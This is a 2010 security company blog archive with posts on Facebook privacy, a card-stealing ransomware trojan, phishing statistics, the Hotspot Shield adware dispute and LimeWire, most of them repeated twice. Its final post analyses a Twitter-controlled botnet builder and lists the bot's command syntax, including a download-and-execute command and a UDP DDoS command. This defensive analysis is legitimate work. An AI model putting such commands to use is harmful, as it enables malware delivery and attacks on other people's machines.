Month: May 2010

Short answer: no, it’s just a numbers game.

The debate is continuing over Facebook’s lack of concern for users’ privacy and strangely difficult procedures for managing users’s privacy settings.

Graham Cluley at the UK AV firm Sophos (http://www.sophos.com/blogs/gc/) drew the world’s attention to the fact that the Google Trends page is showing a spike in searches for the string “delete Facebook account.” The spike is still getting steeper.

What it shows is that there are nearly 30 times as many searches as there were at the lowest period represented in early 2009. It doesn’t say what the absolute numbers are, it just shows a huge increase in the RATE. If one person ran the search in 2009, there could be only 30 people checking it this week. It also doesn’t indicate if the Googlers are finding anything useful or actually deleting their Facebook pages.

Diaspora

Meanwhile, the Diaspora group (http://www.joindiaspora.com/) four college students who set out several weeks ago to raise some cash to support themselves while they write a “the privacy aware, personally controlled, do-it-all distributed open source social network,” are getting far more pledges of support than just the $10,000 they set out to raise:

Just say “No” to Facebook

A protest site QuitFacebookDay.com (http://www.quitfacebookday.com/), meanwhile has begun pushing the idea of users leaving Facebook. As of this afternoon, 3,466 people had committed to quit.

But, the big number

To put all this in perspective, we have a headline from the AllFaceBook.com blog (which is not connected to Facebook): http://www.allfacebook.com/2010/05/facebook-prepares-to-announce-500-million-users/#more-14403

“Facebook Prepares To Announce 500 Million Users”

Nick O’Neill writes there: “Facebook is working on plans for their 500 million user celebration, projected to take place at some point before the end of June.”

And this:

“Before the end of this year, the company should near the 600 million user mark and surpass $1 billion in annualized revenue.”

With numbers like that, Facebook’s privacy policy can probably be summed up in a couple of sentences — something like: “We don’t care. We’re so big we don’t have to.”

Tom Kelchner

Trojan-Ransom.Win32.Winac.A

Our analyst Adam Thomas found this: a piece of ransomware that locks up Windows until you enter your credit card data.

First it claims you are running a pirated version of Windows and they need your billing details. “…but your credit card will NOT be charged.”

And of course that’s true.

Once you enter your credit card details, it will “activate” your “pirated” OS and make it legitimate:

Basically, the Trojan locks your system. The only thing you can do is complete the “activation”.  You can choose to “activate windows” or “do it later”. If you choose to do it later, you machine reboots.

If you go through the process of entering your data (including your credit card number), then your system will work again.

Your credit card information is shipped off to a network of fast-flux bots standing by ready to receive it.

VIPRE detects it as Trojan-Ransom.Win32.Winac.A

Thanks Adam

Tom Kelchner

 

Trojan-Ransom.Win32.Winac.A

Our analyst Adam Thomas found this: a piece of ransomware that locks up Windows until you enter your credit card data.

First it claims you are running a pirated version of Windows and they need your billing details. “…but your credit card will NOT be charged.”

And of course that’s true.

Once you enter your credit card details, it will “activate” your “pirated” OS and make it legitimate:

Basically, the Trojan locks your system. The only thing you can do is complete the “activation”.  You can choose to “activate windows” or “do it later”. If you choose to do it later, you machine reboots.

If you go through the process of entering your data (including your credit card number), then your system will work again.

Your credit card information is shipped off to a network of fast-flux bots standing by ready to receive it.

VIPRE detects it as Trojan-Ransom.Win32.Winac.A

Thanks Adam

Tom Kelchner

 

1. Google Trends are showing an increased interest in deleting Facebook accounts.

Google’s “Trends” site shows an interesting graph of people doing searches for “delete Facebook account”
(http://www.google.com/trends?q=delete+facebook+account)

What the graph is showing is that there are ten times as many searches for “delete Facebook Account” recently as there were in 2008. The rate has been rising through 2009 and is rising at a much steeper rate recently.

2. The Diaspora group is attracting a lot more money than they set out to raise

On Tuesday we blogged about the four New York college students who set out to raise $10,000 on the KickStarter site to pay for pizza and Mountain Dew over the summer while they write a “privacy aware, personally controlled, do-it-all distributed open source social network” that they are calling “Diaspora.”

We checked the KickStarter page for Diaspora then and wrote: “As of mid-afternoon today their web site said they’d raised $33,179 from 1027 backers. They had been seeking $10,000 to support themselves over the summer while they finished the project.” http://sunbeltblog.blogspot.com/2010/05/nyu-students-building-open-source.html

Well, that was three days ago. Here is what the KickStarter page says for Diaspora today:

These guys only set out to get $10,000! They’re up to $142,104 and the number is climbing by the minute!

Facebook has 350 million subscribers, so, it’s not like Farmville is going to become a ghost town overnight and there won’t be anybody left to bring in the fall harvest. However, the data above is starting to point to a trend and should be Facebook’s wake-up call about the privacy issue.

Tom Kelchner

1. Google Trends are showing an increased interest in deleting Facebook accounts.

Google’s “Trends” site shows an interesting graph of people doing searches for “delete Facebook account”
(http://www.google.com/trends?q=delete+facebook+account)

What the graph is showing is that there are ten times as many searches for “delete Facebook Account” recently as there were in 2008. The rate has been rising through 2009 and is rising at a much steeper rate recently.

2. The Diaspora group is attracting a lot more money than they set out to raise

On Tuesday we blogged about the four New York college students who set out to raise $10,000 on the KickStarter site to pay for pizza and Mountain Dew over the summer while they write a “privacy aware, personally controlled, do-it-all distributed open source social network” that they are calling “Diaspora.”

We checked the KickStarter page for Diaspora then and wrote: “As of mid-afternoon today their web site said they’d raised $33,179 from 1027 backers. They had been seeking $10,000 to support themselves over the summer while they finished the project.” http://sunbeltblog.blogspot.com/2010/05/nyu-students-building-open-source.html

Well, that was three days ago. Here is what the KickStarter page says for Diaspora today:

These guys only set out to get $10,000! They’re up to $142,104 and the number is climbing by the minute!

Facebook has 350 million subscribers, so, it’s not like Farmville is going to become a ghost town overnight and there won’t be anybody left to bring in the fall harvest. However, the data above is starting to point to a trend and should be Facebook’s wake-up call about the privacy issue.

Tom Kelchner

Number of attacks doubled in second half of year, but dying out in 2010

The Anti Phishing Working Group has released its “Global Phishing Survey: Trends and Domain Name Use 2H2009.” Highlights include:

— The Avalanche phishing gang was behind two-thirds of the 126,697 phishing attacks launched in the second half of last year.

— The uptime of phishing attacks continues to drop because of the response to Avalanche. Avalanche phish have half the up-time as non-Avalanche domains.

— APWG estimated that there were at least 126,697 phishing attacks in the second half of the year and 55,698 attacks in the first half.

— Phishing remains concentrated in just four top level domains: 76 percent of the attacks occurred in .COM, .EU, .NET, and .UK.

— Eighty eight percent of the malicious domain registrations were made in just five top level domains: .BE, .COM, .EU, .NET and .UK.

Avalanche is on the decline though. The report says: “Avalanche domain registrations hit a high in December 2009, but by then Avalanche was hosting fewer and fewer attacks overall. By March 2010, Avalanche was hosting only one phishing attack on each domain it registered, and attacks dwindled to just 59 in the month of April 2010.”

Report here: http://www.antiphishing.org/reports/APWG_GlobalPhishingSurvey_2H2009.pdf

Tom Kelchner

Number of attacks doubled in second half of year, but dying out in 2010

The Anti Phishing Working Group has released its “Global Phishing Survey: Trends and Domain Name Use 2H2009.” Highlights include:

— The Avalanche phishing gang was behind two-thirds of the 126,697 phishing attacks launched in the second half of last year.

— The uptime of phishing attacks continues to drop because of the response to Avalanche. Avalanche phish have half the up-time as non-Avalanche domains.

— APWG estimated that there were at least 126,697 phishing attacks in the second half of the year and 55,698 attacks in the first half.

— Phishing remains concentrated in just four top level domains: 76 percent of the attacks occurred in .COM, .EU, .NET, and .UK.

— Eighty eight percent of the malicious domain registrations were made in just five top level domains: .BE, .COM, .EU, .NET and .UK.

Avalanche is on the decline though. The report says: “Avalanche domain registrations hit a high in December 2009, but by then Avalanche was hosting fewer and fewer attacks overall. By March 2010, Avalanche was hosting only one phishing attack on each domain it registered, and attacks dwindled to just 59 in the month of April 2010.”

Report here: http://www.antiphishing.org/reports/APWG_GlobalPhishingSurvey_2H2009.pdf

Tom Kelchner

AnchorFree’s response to our blog post:

Hey Tom,

This is Art from Hotspot Shield. I work for the marketing department.

I wanted to bring to your notice that users don’t start seeing ads just by downloading/installing Hotspot Shield. They only see ad if they connect to Hotspot Shield. So, they are basically opting in to see the ads in exchange for using our services. We are very upfront about this to our users.

Once they disconnect, they go back to the normal browsing without any ad
insertion. User is informed that HotspotShield is supported by advertisements
before the download and at the start of each private browsing session.

Also, we never store real user IP address and never provide real user IP
to any advertiser. Therefore, neither we nor our advertisers can disclose real
IP of our user even if compelled. Although I agree that it is not very clear in
our privacy policy. But we never store/share any users’ personal data. We limit
list of our advertisers to only ones who agree NOT to receive real user IP.

Feel free to email me or call me if you have any questions.

Cheers,
art

Our response from Eric Howes, Sunbelt Spyware Research Manager

Art:

I’m sorry, but nothing in your response changes our conclusion that Hotspot Shield is adware and that it is being presented to users in a deceptive manner. Let’s look at your claims one by one.

They only see ad if they connect to Hotspot Shield. So, they are basically opting in to see the ads in exchange for using our services.

Most adware vendors can and have made similar claims. The term “adware” was, in fact, coined to describe products that are ad-supported.

We are very upfront about this to our users. Once they disconnect,
they go back to the normal browsing without any ad insertion.

There is nothing straightforward, clear, or conspicuous in the disclosures you offer users concerning the ad-supported nature of the product or the fact that ad networks can (and undoubtedly are) using tracking technologies to monitor users’ response to ads and personalize those ads.

User is informed that HotspotShield is supported by advertisements before
the download and at the start of each private browsing session.

Neither of these claims is true. There is no notice on the Hotspot Shield home page or download page that the product is ad-supported. To the contrary, the home page sports that flashy green “no adware/spyware” logo, leading users to believe that quite the opposite is true. Although there is a link to the “terms of service,” that link is at the bottom of the page (the download link is at the top right), and even then users must scroll down to section 9 to find any mention of advertisements.

The installation/setup process similarly lacks any notice of these material terms outside of the EULA. Curiously, there is a separate screen for the optional toolbar (presented to users as a means of helping AnchorFree keep the product free for use), but nothing equivalent for the advertising functionality of the core program itself.

Finally, what the user sees at the start of each private browsing session is a connection status message that, again, makes no mention of the ad-supported nature of the product.

It should also be noted that even though I carefully unchecked all the options to have AnchorFree take over my home page, search, and error page settings, my browser’s home page was still hijacked to the AnchorFree “privacy search” page at the start of each “private browsing session.”

Also, we never store real user IP address and never provide real user IP to any advertiser. Therefore, neither we nor our advertisers can disclose real IP of our user even if compelled. Although I agree that it is not very clear in our privacy policy. But we never store share any users’ personal data. We limit list of our advertisers to only ones who agree NOT to receive real user IP.

The real problem is that AnchorFree goes out of its way to create user expectations that are entirely opposite of the true ad-supported functionality of the product. Moreover, it’s fairly well established at this point that users’ true identities (or something very close to them) can, given enough data, be derived from the browsing profiles created via the tracking technologies used by major ad networks.

The key test or question in this case is a simple one. AnchorFree promotes Hotspot Shield as means for “protecting your privacy, security, and anonymity on the web.” What would users think if they knew that the very first thing AnchorFree does after users start a “private browsing session” is hand them over to invasive advertising networks? I think they would be appalled.

Eric Howes
Sunbelt Software

AnchorFree’s response to our blog post:

Hey Tom,

This is Art from Hotspot Shield. I work for the marketing department.

I wanted to bring to your notice that users don’t start seeing ads just by downloading/installing Hotspot Shield. They only see ad if they connect to Hotspot Shield. So, they are basically opting in to see the ads in exchange for using our services. We are very upfront about this to our users.

Once they disconnect, they go back to the normal browsing without any ad
insertion. User is informed that HotspotShield is supported by advertisements
before the download and at the start of each private browsing session.

Also, we never store real user IP address and never provide real user IP
to any advertiser. Therefore, neither we nor our advertisers can disclose real
IP of our user even if compelled. Although I agree that it is not very clear in
our privacy policy. But we never store/share any users’ personal data. We limit
list of our advertisers to only ones who agree NOT to receive real user IP.

Feel free to email me or call me if you have any questions.

Cheers,
art

Our response from Eric Howes, Sunbelt Spyware Research Manager

Art:

I’m sorry, but nothing in your response changes our conclusion that Hotspot Shield is adware and that it is being presented to users in a deceptive manner. Let’s look at your claims one by one.

They only see ad if they connect to Hotspot Shield. So, they are basically opting in to see the ads in exchange for using our services.

Most adware vendors can and have made similar claims. The term “adware” was, in fact, coined to describe products that are ad-supported.

We are very upfront about this to our users. Once they disconnect,
they go back to the normal browsing without any ad insertion.

There is nothing straightforward, clear, or conspicuous in the disclosures you offer users concerning the ad-supported nature of the product or the fact that ad networks can (and undoubtedly are) using tracking technologies to monitor users’ response to ads and personalize those ads.

User is informed that HotspotShield is supported by advertisements before
the download and at the start of each private browsing session.

Neither of these claims is true. There is no notice on the Hotspot Shield home page or download page that the product is ad-supported. To the contrary, the home page sports that flashy green “no adware/spyware” logo, leading users to believe that quite the opposite is true. Although there is a link to the “terms of service,” that link is at the bottom of the page (the download link is at the top right), and even then users must scroll down to section 9 to find any mention of advertisements.

The installation/setup process similarly lacks any notice of these material terms outside of the EULA. Curiously, there is a separate screen for the optional toolbar (presented to users as a means of helping AnchorFree keep the product free for use), but nothing equivalent for the advertising functionality of the core program itself.

Finally, what the user sees at the start of each private browsing session is a connection status message that, again, makes no mention of the ad-supported nature of the product.

It should also be noted that even though I carefully unchecked all the options to have AnchorFree take over my home page, search, and error page settings, my browser’s home page was still hijacked to the AnchorFree “privacy search” page at the start of each “private browsing session.”

Also, we never store real user IP address and never provide real user IP to any advertiser. Therefore, neither we nor our advertisers can disclose real IP of our user even if compelled. Although I agree that it is not very clear in our privacy policy. But we never store share any users’ personal data. We limit list of our advertisers to only ones who agree NOT to receive real user IP.

The real problem is that AnchorFree goes out of its way to create user expectations that are entirely opposite of the true ad-supported functionality of the product. Moreover, it’s fairly well established at this point that users’ true identities (or something very close to them) can, given enough data, be derived from the browsing profiles created via the tracking technologies used by major ad networks.

The key test or question in this case is a simple one. AnchorFree promotes Hotspot Shield as means for “protecting your privacy, security, and anonymity on the web.” What would users think if they knew that the very first thing AnchorFree does after users start a “private browsing session” is hand them over to invasive advertising networks? I think they would be appalled.

Eric Howes
Sunbelt Software

We’ve gotten some inquiries about why VIPRE has been detecting Hotspot Shield (http://www.hotspotshield.com/) as adware since May 4. Some thought it might be a false positive. It isn’t.

The Hotspot Shield web site carries the below graphic that says “NO spyware / adware.”

Well just SAYING “NO spyware / adware” doesn’t make it happen.

Here’s what the Hotspot Shield “terms of service” say (http://hotspotshield.com/terms/):

“9.1 Advertisements. AnchorFree may deliver third-party advertisements (“Advertisements”) within the content of any web page accessed. Advertisements may be injected into the top of the page, inserted directly into the page content, or even displayed to overlay the page. You hereby acknowledge and consent that AnchorFree may alter the content of any web page accessed for the purpose of displaying Advertisements. Additionally from time to time, AnchorFree may prevent any user’s access to the product or continued use thereof until such user has successfully participated in applicable advertising programs, surveys, or other activities that collect and monetize users’ personal information. AnchorFree does not endorse any information, materials, products, or services contained in or accessible through Advertisements.”
It also says: “AnchorFree allows other companies, called third-party ad servers or ad networks, to serve advertisements within the Hotspot Shield. These third-party ad servers or ad networks use technology to send, directly to your browser, the advertisements and links that appear on the Hotspot Shield. They automatically receive the virtual IP Address assigned by AnchorFree when this happens. They may also use other technologies (such as cookies, javascript, or web beacons) to measure the effectiveness of their advertisements and to personalize their advertising content.”

This from a company that claims to be “Protecting the web for your security, privacy and anonymity!”

Eric Howes, Sunbelt Software Spyware Research Manager, said on the Sunbelt Support Forum:
http://supportforums.sunbeltsoftware.com/messageview.aspx?catid=76&threadid=4649&enterthread=y

“If a company is injecting ads into the user’s browser and onto the user’s desktop and using tracking technology to “personalize” those advertisements, then it is most certainly delivering adware/spyware to users, and any disclaimers to the contrary are simply deceptive.

“That’s why we added the detection for Hotspot Shield. If you want to continue the program yourself, that’s your decision. But this detection is not a false positive.”

Tom Kelchner

We’ve gotten some inquiries about why VIPRE has been detecting Hotspot Shield (http://www.hotspotshield.com/) as adware since May 4. Some thought it might be a false positive. It isn’t.

The Hotspot Shield web site carries the below graphic that says “NO spyware / adware.”

Well just SAYING “NO spyware / adware” doesn’t make it happen.

Here’s what the Hotspot Shield “terms of service” say (http://hotspotshield.com/terms/):

“9.1 Advertisements. AnchorFree may deliver third-party advertisements (“Advertisements”) within the content of any web page accessed. Advertisements may be injected into the top of the page, inserted directly into the page content, or even displayed to overlay the page. You hereby acknowledge and consent that AnchorFree may alter the content of any web page accessed for the purpose of displaying Advertisements. Additionally from time to time, AnchorFree may prevent any user’s access to the product or continued use thereof until such user has successfully participated in applicable advertising programs, surveys, or other activities that collect and monetize users’ personal information. AnchorFree does not endorse any information, materials, products, or services contained in or accessible through Advertisements.”
It also says: “AnchorFree allows other companies, called third-party ad servers or ad networks, to serve advertisements within the Hotspot Shield. These third-party ad servers or ad networks use technology to send, directly to your browser, the advertisements and links that appear on the Hotspot Shield. They automatically receive the virtual IP Address assigned by AnchorFree when this happens. They may also use other technologies (such as cookies, javascript, or web beacons) to measure the effectiveness of their advertisements and to personalize their advertising content.”

This from a company that claims to be “Protecting the web for your security, privacy and anonymity!”

Eric Howes, Sunbelt Software Spyware Research Manager, said on the Sunbelt Support Forum:
http://supportforums.sunbeltsoftware.com/messageview.aspx?catid=76&threadid=4649&enterthread=y

“If a company is injecting ads into the user’s browser and onto the user’s desktop and using tracking technology to “personalize” those advertisements, then it is most certainly delivering adware/spyware to users, and any disclaimers to the contrary are simply deceptive.

“That’s why we added the detection for Hotspot Shield. If you want to continue the program yourself, that’s your decision. But this detection is not a false positive.”

Tom Kelchner

If you’ve been squeezing the last bit of value out of that installation of Windows XP Service Pack 2 or are continuing to run it because of proprietary software that you’re squeezing the last bit of value out of, well, you only have two more months of squeezing. Microsoft will end support for Service Pack 2 on July 13.

Now if you can somehow upgrade to Service Pack 3, you can forget about the problem until Microsoft’s Extended Support for XP ends April 8, 2014, assuming the hard drive in that PC you bought in 2001 lasts that long. Meanwhile, I wouldn’t slack off on the backups.

And, no, July 13 isn’t on a Friday.

Support for Windows XP Service Pack 2 ends on July 13, 2010

Microsoft’s page on this is here.

Tom Kelchner

If you’ve been squeezing the last bit of value out of that installation of Windows XP Service Pack 2 or are continuing to run it because of proprietary software that you’re squeezing the last bit of value out of, well, you only have two more months of squeezing. Microsoft will end support for Service Pack 2 on July 13.

Now if you can somehow upgrade to Service Pack 3, you can forget about the problem until Microsoft’s Extended Support for XP ends April 8, 2014, assuming the hard drive in that PC you bought in 2001 lasts that long. Meanwhile, I wouldn’t slack off on the backups.

And, no, July 13 isn’t on a Friday.

Support for Windows XP Service Pack 2 ends on July 13, 2010

Microsoft’s page on this is here.

Tom Kelchner

AllFaceBook.com, (not a Facebook company web site) is reporting that insider contacts say Facebook has called an all-hands meeting today to discuss the company’s privacy strategy.

With the many controversies stemming from Facebook’s cavalier attitude to users’ personal data security, it has been conjectured that the social media giant might adopt an “opt-in” policy for features that share users’ information.

Blog post here: “Facebook Calls All Hands Meeting On Privacy”

The Electronic Freedom Foundation posted (in April) a great timeline of Facebook’s changing security policy statements over the last five years: “Facebook’s Eroding Privacy Policy: A Timeline”

Tom Kelchner

AllFaceBook.com, (not a Facebook company web site) is reporting that insider contacts say Facebook has called an all-hands meeting today to discuss the company’s privacy strategy.

With the many controversies stemming from Facebook’s cavalier attitude to users’ personal data security, it has been conjectured that the social media giant might adopt an “opt-in” policy for features that share users’ information.

Blog post here: “Facebook Calls All Hands Meeting On Privacy”

The Electronic Freedom Foundation posted (in April) a great timeline of Facebook’s changing security policy statements over the last five years: “Facebook’s Eroding Privacy Policy: A Timeline”

Tom Kelchner

ArsTechnica is reporting that U.S. Federal Judge Kimba Wood of the United States District Court for the Southern District of New York has granted summary judgment against LimeWire in an action by brought by Recording Industry Association of America (RIAA), which claimed the peer-to-peer file-sharing service was facilitating copyright infringement.

Penalties against LimeWire and its CEO Mark Gorton will be set after a status conference on June 1.

During the legal proceedings, an expert witness called by the RIAA testified that in a sample of 1,800 LimeWire files he examined, 93 percent were copyrighted.

In other testimony it was revealed that LimeWire had opened a digital music store and used filtering to prevent users from sharing digital recordings purchased from it, but didn’t filter to prevent them from sharing anything else.

“In Wood’s view, this all adds up to a business model knowingly built on copyright infringement, and it continued with no attempt to address the massive problem,” according to the article in ArsTechnica (“LimeWire sliced by RIAA, guilty of massive infringement”)

More coverage here in Wall Street Journal: “CopyWrong! Kimba Wood Squeezes the Juice Out of Limewire”

This is big news for LimeWire users who never knew you were supposed to pay for music and the artists and recording companies who would like them to learn.

Tom Kelchner

ArsTechnica is reporting that U.S. Federal Judge Kimba Wood of the United States District Court for the Southern District of New York has granted summary judgment against LimeWire in an action by brought by Recording Industry Association of America (RIAA), which claimed the peer-to-peer file-sharing service was facilitating copyright infringement.

Penalties against LimeWire and its CEO Mark Gorton will be set after a status conference on June 1.

During the legal proceedings, an expert witness called by the RIAA testified that in a sample of 1,800 LimeWire files he examined, 93 percent were copyrighted.

In other testimony it was revealed that LimeWire had opened a digital music store and used filtering to prevent users from sharing digital recordings purchased from it, but didn’t filter to prevent them from sharing anything else.

“In Wood’s view, this all adds up to a business model knowingly built on copyright infringement, and it continued with no attempt to address the massive problem,” according to the article in ArsTechnica (“LimeWire sliced by RIAA, guilty of massive infringement”)

More coverage here in Wall Street Journal: “CopyWrong! Kimba Wood Squeezes the Juice Out of Limewire”

This is big news for LimeWire users who never knew you were supposed to pay for music and the artists and recording companies who would like them to learn.

Tom Kelchner

The Washington Post is carrying a story and video of Pam Horan, president of the Online Publishers Association, discussing the draft privacy bill that Rep. Rick Boucher (D-Va.) and Rep. Cliff Sterns (R-Fla.) introduced last week. (See Sunbelt Blog pieces here, and here.) Cecilia Kang on her Post Tech blog asked Horan to post one question to Boucher about the bill.

Horan said the Online Advertisers biggest concern is how the ultimate wording of the bill will define “precise geolocation information”

Information about a person’s location falls is in the category of “sensitive information” in the bill and advertisers would not be allowed to collect that data unless users opted in.

Horan said with users buying more portable devices such as the iPad, advertisers would like to be able to deliver coupons and ads for businesses near them using global positioning technology.

“This can all be done in a way that is non-identifiable and is a huge opportunity for us,” Horan said.

Story and video here: “Online publishers question Boucher privacy bill”

According to Hillicon, the technology blog of The Hill web site, Boucher said today that the bill is not an attempt to inhibit responsible targeted advertising.

At this point the draft bill requires companies to disclose the fact that they collect information from consumers and port the information into Web ads. Those that fail to make proper disclosure could face penalties from the Federal Trade Commission.

The next draft of the bill could be complete by the middle of next month.

The Information Law Group posted a great analysis of the draft bill today here: “Breaking Down the Boucher Bill”

Tom Kelchner

The Washington Post is carrying a story and video of Pam Horan, president of the Online Publishers Association, discussing the draft privacy bill that Rep. Rick Boucher (D-Va.) and Rep. Cliff Sterns (R-Fla.) introduced last week. (See Sunbelt Blog pieces here, and here.) Cecilia Kang on her Post Tech blog asked Horan to post one question to Boucher about the bill.

Horan said the Online Advertisers biggest concern is how the ultimate wording of the bill will define “precise geolocation information”

Information about a person’s location falls is in the category of “sensitive information” in the bill and advertisers would not be allowed to collect that data unless users opted in.

Horan said with users buying more portable devices such as the iPad, advertisers would like to be able to deliver coupons and ads for businesses near them using global positioning technology.

“This can all be done in a way that is non-identifiable and is a huge opportunity for us,” Horan said.

Story and video here: “Online publishers question Boucher privacy bill”

According to Hillicon, the technology blog of The Hill web site, Boucher said today that the bill is not an attempt to inhibit responsible targeted advertising.

At this point the draft bill requires companies to disclose the fact that they collect information from consumers and port the information into Web ads. Those that fail to make proper disclosure could face penalties from the Federal Trade Commission.

The next draft of the bill could be complete by the middle of next month.

The Information Law Group posted a great analysis of the draft bill today here: “Breaking Down the Boucher Bill”

Tom Kelchner

At the tail end of last year, Botnets controlled by Twitter accounts started to make the news. They’ve kind of faded from view a little since then, but one enterprising coder is hoping they’ll make a comeback with a tool designed to make botting simple for script kiddies the world over.

This is the builder we’ll be looking at today:

Firing the program up gives the most basic of interfaces – all you can do is enter a Twitter Username and hit the “Build” button:

Once done, an executable file is created that will keep an eye on the named Twitter account for a series of commands used to infect, download, attack with DDoS and even kill the connection between Bot and Command channel. This is the file that’s created:

Of course, the attacker will change the name and the icon before attempting to send it to a victim. Should an end-user infect themselves, the attacker simply posts one of the following commands to their Twitter feed and the Bot will happily oblige:

.VISIT*link.com* (The attacker can add a 0 at the end to repeatedly open a weblink in an “invisible” manner, or a 1 if they want to pop open a website for giggles on the infected PC. Above, you can see a Twitter account telling all bots to open up Google.com in a visible web browser).

.DDOS*IP*PORT (This is a UDP attack).

.SAY* (This one takes advantage of the text to speech feature on a Windows machine, babbling a phrase of choice at the confused victim).

.DOWNLOAD*link.com/file.exe* (The attacker can add a 0 at the end to download, or a 1 if they want to download and execute a file).

.STOP (This will tell the Bots to cease their activities, regardless of whether that’s a DDoS attack or a world record attempt for the amount of times they can open up a Rickroll).

.REMOVEALL (This cuts the connection between bot and Twitter account).

Here’s a screenshot of Youtube popped open on an infected PC courtesy of a .VISIT command – note the shot of the Wireshark traffic indicating the bot / Twitter connection just before the browser opens:

All in all, a very slick tool and no doubt script kiddies everywhere are salivating over the prospect of hitting a website with a DDoS from their mobile phones. However, something to keep in mind: anyone using this as an attack method is horribly exposed.

For one thing, this doesn’t work if the person controlling the bots attempts to hide their commands with a private Twitter page; the bots will just flail aimlessly as they wonder where their master has gone. There are two side effects of “being public” as a result:

1) In theory it should be easy for Twitter to track / filter / block anyone issuing these commands – and security researchers on Twitter who go hunting for these things will probably ensure offending accounts are reported and banned.

2) It only takes a quick Twitter Search to reveal who is using this Bot method at the moment:

Even better, things get extremely complicated if you’re apparently posting Bot commands from a Twitter feed that contains your full name, your geographic location and a link to your homepage that gives up your home address & phone number from a Whois search.

Whoops.

We’ve notified Twitter about this bot creation system, and they’re looking into it. I’d also like to point out that they took exactly thirteen minutes to respond to my email, which is rather impressive by any standards.

We detect the infection file as Hacktool.win32.Twebot.A.

Christopher Boyd